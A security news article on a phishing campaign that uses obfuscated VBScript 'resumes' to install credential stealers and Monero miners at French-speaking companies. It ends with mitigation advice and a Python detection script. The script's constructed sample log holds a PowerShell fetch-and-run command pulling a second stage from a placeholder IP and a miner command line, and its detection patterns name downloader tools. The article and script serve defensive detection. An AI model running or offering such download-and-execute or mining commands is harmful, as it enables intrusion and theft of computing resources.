Hackers Use Fake Resumes to Steal Credentials, Deploy Crypto Miners

A sophisticated phishing campaign is targeting French-speaking corporate environments with fake job resumes that lead to the theft of enterprise credentials and the deployment of cryptocurrency-mining malware. Researchers at Securonix detailed the ongoing attack, which relies on heavily obfuscated VBScript files disguised as curriculum vitae (CV) documents.

Attack Methodology and Initial Infection

The campaign begins with phishing emails carrying malicious attachments presented as resumes or CVs, a lure chosen because hiring generates a high volume of document exchanges in which opening a file from a stranger is routine. According to researchers Shikha Sangwan, Akshay Gaikwad, and Aaron Beardslee, the attachments are VBScript files that have been heavily obfuscated to evade detection by security software.

When an employee opens the file, Windows by default hands it to the Windows Script Host (wscript.exe) and the script runs with that user's privileges. Its primary job is to download and execute additional payloads from attacker-controlled servers. This multi-stage approach keeps the attachment itself small and generic, and lets the attackers choose which malware to deploy based on their objectives and the compromised system's environment.

Malware Payloads and Objectives

The final payloads of this campaign serve a dual purpose: information theft and resource hijacking. One of the key malware families deployed is an information stealer that harvests sensitive credentials from the infected machine, including saved browser passwords, session cookies, and other authentication data that could provide access to corporate networks and cloud services. Stolen session cookies are especially valuable to an attacker because replaying them can sidestep multi-factor authentication on the services they belong to.

Alongside the stealer, the attackers deploy a cryptocurrency miner that silently uses the processing power of the infected corporate computers to mine a digital currency such as Monero for the attackers' profit. For the victim organization this means noticeably slower machines, higher electricity costs, and added wear on hardware for as long as the miner runs undetected.

Geographic and Linguistic Targeting

The campaign's focus on French-speaking corporate environments points to a deliberate targeting strategy. The phishing emails and decoy documents are likely written in French to appear legitimate and raise the odds of infection at companies in France, Belgium, Canada, Switzerland, and other Francophone regions. Localized lures also tend to slip past spam filters and user awareness training that are tuned mainly to English-language phishing.

Security Implications for Organizations

This campaign highlights a persistent threat to corporate security: social engineering that mimics routine business communication. A fake resume abuses a fundamental and trusted business process in which opening unsolicited documents from strangers is the norm, so employees cannot simply be told never to open them. The combination of credential theft and crypto-mining also demonstrates the layered financial motives of modern cybercriminals, who seek both immediate income from mining and durable access for follow-on attacks.

Security teams should treat unsolicited resumes with heightened suspicion, especially those arriving by email from unknown senders, and where possible route hiring documents through a controlled intake channel rather than individual inboxes. Technical defenses should include email filtering that quarantines script attachments (.vbs, .vbe, .wsf, .js) outright; application control (AppLocker or Windows Defender Application Control) that blocks wscript.exe and cscript.exe from running scripts out of user-writable locations such as Downloads, Temp, and the Outlook attachment cache, or at minimum reassigning those extensions to open in a text editor; and endpoint detection capable of recognizing the behavioral chain of a script host making outbound connections, spawning PowerShell, or launching an unknown binary with mining-pool arguments.
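The behavioral detection described above, and the multi-stage chain from the infection section, as an added example in Python (this is not code or data from Securonix's report): the script walks constructed Sysmon-style process-creation and network events, marks a process tree as suspect once a script host is started with a .vbs from an attachment directory, and then flags descendants that download a second stage or carry generic Monero-mining command-line markers. The pipe-delimited log layout, file names, process IDs and 203.0.113.x addresses are all assumptions made for this example, and the miner markers are generic ones rather than indicators from the campaign.

```python
"""Added example (not Securonix's code or data): behavioural detection of the
fake-resume chain over constructed, Sysmon-style process events.

Log layout is an assumption made for this example: a pipe-delimited flattening
of Sysmon Event ID 1 (process creation) and Event ID 3 (network connection),
    timestamp|event_id|pid|ppid|image|detail
where detail is the command line (event 1) or destination ip:port (event 3).
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|wsf|js|jse)\b", re.I)
# Paths where a mail client or browser drops an attachment. They are
# user-writable and not where a sanctioned admin script lives.
ATTACHMENT_DIRS = (
    "\\content.outlook\\",
    "\\inetcache\\",
    "\\downloads\\",
    "\\appdata\\local\\temp\\",
)
DOWNLOADER = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|bitsadmin|"
    r"certutil.*-urlcache|\bcurl\b)",
    re.I,
)
# Generic Monero-mining markers (pool URL scheme, common miner switches);
# not indicators taken from the campaign itself.
MINER = re.compile(
    r"(stratum\+(tcp|ssl)://|--donate-level|--coin[= ]monero|\bxmrig\b)", re.I
)

# Constructed sample log. Outlook (pid 4412) opens "CV_Jean_Dupont.vbs"; the
# script host calls out, spawns a PowerShell downloader, which drops a miner.
# Pid 6000 is a benign IT inventory script from ProgramData and must not fire.
SAMPLE_LOG = r"""
2024-05-06T09:12:01|1|5020|4412|C:\Windows\System32\wscript.exe|"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ABC123\CV_Jean_Dupont.vbs"
2024-05-06T09:12:03|3|5020|4412|C:\Windows\System32\wscript.exe|203.0.113.45:443
2024-05-06T09:12:05|1|5100|5020|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/stage2.ps1')"
2024-05-06T09:12:09|1|5160|5100|C:\Users\alice\AppData\Roaming\svchost.exe|svchost.exe -o stratum+tcp://203.0.113.45:3333 --donate-level=1 --coin=monero -k
2024-05-06T09:15:00|1|6000|3890|C:\Windows\System32\cscript.exe|cscript.exe //nologo C:\ProgramData\Scripts\inventory.vbs
2024-05-06T09:15:01|3|6000|3890|C:\Windows\System32\cscript.exe|10.0.0.5:445
"""


def parse(log_text):
    """Turn the flattened log into event dicts, skipping blank lines."""
    events = []
    for line in log_text.strip().splitlines():
        if not line.strip():
            continue
        ts, eid, pid, ppid, image, detail = line.split("|", 5)
        events.append({"ts": ts, "eid": int(eid), "pid": int(pid),
                       "ppid": int(ppid), "image": image, "detail": detail})
    return events


def detect(events):
    """Return (rule, pid, detail) findings in event order.

    A process tree becomes suspect once a script host starts a script from an
    attachment directory; every descendant inherits the mark, so the same
    download or miner command line is ignored under a legitimate parent.
    """
    suspect = set()
    findings = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        detail = ev["detail"]
        if ev["eid"] == 1:
            if ev["ppid"] in suspect:
                suspect.add(ev["pid"])
            if (image in SCRIPT_HOSTS and SCRIPT_EXT.search(detail)
                    and any(d in detail.lower() for d in ATTACHMENT_DIRS)):
                suspect.add(ev["pid"])
                findings.append(("script_host_from_attachment_dir", ev["pid"], detail))
            if ev["pid"] in suspect:
                if DOWNLOADER.search(detail):
                    findings.append(("stage2_download", ev["pid"], detail))
                if MINER.search(detail):
                    findings.append(("crypto_miner", ev["pid"], detail))
        elif ev["eid"] == 3 and ev["pid"] in suspect:
            findings.append(("script_host_network", ev["pid"], detail))
    return findings


def is_resume_lure_chain(findings):
    """True when an attachment-launched script host went on to call out,
    download or mine; the combination separates the lure from a stray .vbs."""
    rules = {f[0] for f in findings}
    return ("script_host_from_attachment_dir" in rules and bool(
        rules & {"stage2_download", "crypto_miner", "script_host_network"}))


if __name__ == "__main__":
    found = detect(parse(SAMPLE_LOG))
    for rule, pid, detail in found:
        print(f"{rule:32} pid={pid} {detail[:70]}")
    print("resume-lure chain:", is_resume_lure_chain(found))
```

The first rule alone is noisy in environments that legitimately mail scripts around, which is why the verdict requires a second stage in the same process tree; the benign cscript.exe run from ProgramData in the sample connects to a file server yet produces no finding, because it never enters the suspect set.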

Ongoing Investigation and Future Outlook

Securonix researchers continue to monitor the campaign, and the infrastructure hosting the malicious payloads may be taken down or rotated as the investigation progresses. Organizations in the targeted regions should expect similar attacks using localized social engineering lures. Further analysis of the malware's command-and-control servers may help identify the threat actors and disrupt their operations, and security vendors will likely update their detection signatures to catch the obfuscated VBScript files and associated payloads.

Source: Securonix
